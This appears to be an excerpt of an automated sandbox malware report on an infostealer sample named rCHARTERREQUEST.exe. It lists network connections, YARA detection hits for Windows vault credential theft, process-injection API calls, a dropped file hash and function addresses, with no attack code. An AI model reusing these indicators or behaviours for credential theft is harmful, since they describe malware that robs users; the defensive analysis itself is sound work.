                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49747 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49752 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49836 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:50059 version: TLS 1.2

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 7.2.ilsucsfth.exe.419edc0.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 0.2.rCHARTERREQUEST.exe.43fbca8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 7.2.ilsucsfth.exe.419edc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Source: 5.2.InstallUtil.exe.540000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0643BDE0 NtResumeThread,0_2_0643BDE0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0643BDD8 NtResumeThread,0_2_0643BDD8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_0632ABD0 NtResumeThread,7_2_0632ABD0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06327178 NtProtectVirtualMemory,7_2_06327178
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_0632AC82 NtResumeThread,7_2_0632AC82
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06327171 NtProtectVirtualMemory,7_2_06327171
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0180B4130_2_0180B413
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_018076900_2_01807690
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_01809AA00_2_01809AA0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0180FCB00_2_0180FCB0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_018076800_2_01807680
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_018038080_2_01803808
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_018038180_2_01803818
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_01803D980_2_01803D98
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_01803DA80_2_01803DA8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064376180_2_06437618
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064351800_2_06435180
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064376090_2_06437609
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064397F00_2_064397F0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064313C80_2_064313C8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_064313D80_2_064313D8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B837500_2_06B83750
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B86D800_2_06B86D80
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81D780_2_06B81D78
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8DA450_2_06B8DA45
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8B9040_2_06B8B904
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81EF00_2_06B81EF0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81E300_2_06B81E30
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81E360_2_06B81E36
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81E240_2_06B81E24
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81E1E0_2_06B81E1E
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81E520_2_06B81E52
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B86D720_2_06B86D72
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B81D690_2_06B81D69
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8228D0_2_06B8228D
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B84BF00_2_06B84BF0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B820310_2_06B82031
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B819280_2_06B81928
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B819180_2_06B81918
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B8B9140_2_06B8B914
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06B821080_2_06B82108
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C60C500_2_06C60C50
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C6F6700_2_06C6F670
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C61FF00_2_06C61FF0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C60C400_2_06C60C40
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C683AA0_2_06C683AA
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C683B80_2_06C683B8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06C620000_2_06C62000
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D375700_2_06D37570
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D3DE4D0_2_06D3DE4D
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D39C580_2_06D39C58
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D31C4A0_2_06D31C4A
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D3F4580_2_06D3F458
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D375600_2_06D37560
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D300400_2_06D30040
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D300070_2_06D30007
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D3E1770_2_06D3E177
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D39C480_2_06D39C48
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D378DF0_2_06D378DF
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D3A9910_2_06D3A991
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D3A9A00_2_06D3A9A0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D4A4F80_2_06D4A4F8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D824C80_2_06D824C8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D800400_2_06D80040
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D824BB0_2_06D824BB
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8CC120_2_06D8CC12
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06D8CC200_2_06D8CC20
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06DAECF00_2_06DAECF0
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06DA0AA70_2_06DA0AA7
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_06DA00070_2_06DA0007
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0705E9A80_2_0705E9A8
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_070400060_2_07040006
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_070400400_2_07040040
                        Source: C:\Users\user\Desktop\rCHARTERREQUEST.exeCode function: 0_2_0705E4980_2_0705E498
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007CE5005_2_007CE500
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007CA9405_2_007CA940
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007CD9885_2_007CD988
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007C4A905_2_007C4A90
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007C3E785_2_007C3E78
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_007C41C05_2_007C41C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F0A1985_2_05F0A198
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F0BC485_2_05F0BC48
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F131005_2_05F13100
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F1B2A25_2_05F1B2A2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F1E4185_2_05F1E418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F177105_2_05F17710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F100405_2_05F10040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_05F100175_2_05F10017
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_012876907_2_01287690
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_0128FCB07_2_0128FCB0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_012876807_2_01287680
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_012838087_2_01283808
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_012838187_2_01283818
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_01283DA87_2_01283DA8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_01283D987_2_01283D98
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063262887_2_06326288
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063239E87_2_063239E8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063262787_2_06326278
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063233EE7_2_063233EE
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063233D07_2_063233D0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063200067_2_06320006
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063200407_2_06320040
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_063239D87_2_063239D8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A537507_2_06A53750
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A56D807_2_06A56D80
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51D787_2_06A51D78
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A5B9047_2_06A5B904
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51EF07_2_06A51EF0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51E247_2_06A51E24
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51E367_2_06A51E36
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51E307_2_06A51E30
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51E1E7_2_06A51E1E
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51E527_2_06A51E52
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A58FA97_2_06A58FA9
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A51D697_2_06A51D69
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A56D737_2_06A56D73
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A5228D7_2_06A5228D
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A54BF07_2_06A54BF0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A520317_2_06A52031
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A519287_2_06A51928
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A521087_2_06A52108
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A5B9147_2_06A5B914
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06A519187_2_06A51918
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B30C507_2_06B30C50
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B3F6707_2_06B3F670
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B31FF07_2_06B31FF0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B30C407_2_06B30C40
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B383B87_2_06B383B8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B383AB7_2_06B383AB
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06B320007_2_06B32000
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C075707_2_06C07570
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C0DE4A7_2_06C0DE4A
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C01C4A7_2_06C01C4A
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C09C587_2_06C09C58
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C0F4587_2_06C0F458
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C075607_2_06C07560
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C000407_2_06C00040
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C000077_2_06C00007
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C0E1777_2_06C0E177
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C09C487_2_06C09C48
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C078DF7_2_06C078DF
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C0A9937_2_06C0A993
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C0A9A07_2_06C0A9A0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C1A68D7_2_06C1A68D
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C524C87_2_06C524C8
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C500407_2_06C50040
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C524BB7_2_06C524BB
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C7ECF07_2_06C7ECF0
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C70AA77_2_06C70AA7
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06C700077_2_06C70007
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06F2E4987_2_06F2E498
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06F100407_2_06F10040
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06F100067_2_06F10006
                        Source: C:\Users\user\AppData\Roaming\ilsucsfth.exeCode function: 7_2_06F2E9A87_2_06F2E9A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00E2E6808_2_00E2E680
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00E2A9588_2_00E2A958
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00E24A988_2_00E24A98
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00E23E808_2_00E23E80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_00E241C88_2_00E241C8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0642CF848_2_0642CF84
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0642A1948_2_0642A194
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0642BB588_2_0642BB58
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0642DB108_2_0642DB10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064356408_2_06435640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064366688_2_06436668
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064324188_2_06432418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_06437DF08_2_06437DF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0643C2008_2_0643C200
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0643B2B08_2_0643B2B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064377108_2_06437710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_0643E4188_2_0643E418
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_06435D708_2_06435D70
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064300408_2_06430040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 8_2_064300068_2_06430006
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\ckuv.exe F0881D1C9F9E086EB8D814E03CD6C01F357F0CAE2627FF27E011104C6E88CCEA
                        Source: rCHARTERREQUEST.exeStatic PE information: invalid certificate
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1927556031.00000000043E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1930403057.00000000063D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000000.1652006075.0000000000DA4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamereff.exe2 vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1927556031.0000000004149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamereff.exe2 vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1918032779.000000000318D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs rCHARTERREQUEST.exe
                        Source: rCHARTERREQUEST.exe, 00000000.00000002.1917024832.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rCHARTERREQUEST.exe
